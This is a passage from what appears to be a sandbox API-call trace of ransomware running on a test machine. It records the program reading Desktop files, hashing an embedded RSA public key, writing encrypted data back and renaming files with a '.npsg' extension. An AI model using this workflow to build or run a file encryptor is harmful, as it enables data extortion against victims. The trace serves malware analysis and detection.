lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.506] GetCurrentThreadId () returned 0x5b4 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688bd0 [0236.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.508] GetCurrentThreadId () returned 0x5b4 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400218 [0236.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001b8 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001d0 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001a0 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400230 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400200 [0236.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001e8 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400248 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001e8 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001b8 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400218 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400248 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400230 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001a0 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400188 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b953e0 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.512] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x129bc, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x129bc, lpOverlapped=0x0) returned 1 [0236.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.514] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x129c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.514] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.514] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.514] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.514] CloseHandle (hObject=0x644) returned 1 [0236.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b8f7a8 [0236.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.517] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zyk83hZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zyk83hz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zyk83hZ.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zyk83hz.flv.npsg")) returned 1 [0236.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.518] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.520] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1746f7f0, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x6b920870, ftLastAccessTime.dwHighDateTime=0x1d5ba20, ftLastWriteTime.dwLowDateTime=0x6b920870, ftLastWriteTime.dwHighDateTime=0x1d5ba20, nFileSizeHigh=0x0, nFileSizeLow=0x18412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_0O68mwK4x9FM24.avi", cAlternateFileName="_0O68M~1.AVI")) returned 1 [0236.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.520] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_0O68mwK4x9FM24.avi") returned=".avi" [0236.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_0O68mwK4x9FM24.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_0o68mwk4x9fm24.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.521] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=99346) returned 1 [0236.521] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.523] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x183ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.523] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.525] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.525] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18412, lpOverlapped=0x0) returned 1 [0236.526] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.526] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.526] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.526] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.527] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.527] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.527] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.527] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.527] GetLastError () returned 0x0 [0236.528] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.528] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.528] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.528] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.528] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18410) returned 0x3b95d50 [0236.529] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b953e0 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400188 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95428 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001a0 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001d0 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400230 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001e8 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.529] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400230 | out: hHeap=0x620000) returned 1 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400230 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001e8 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34001d0 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.530] 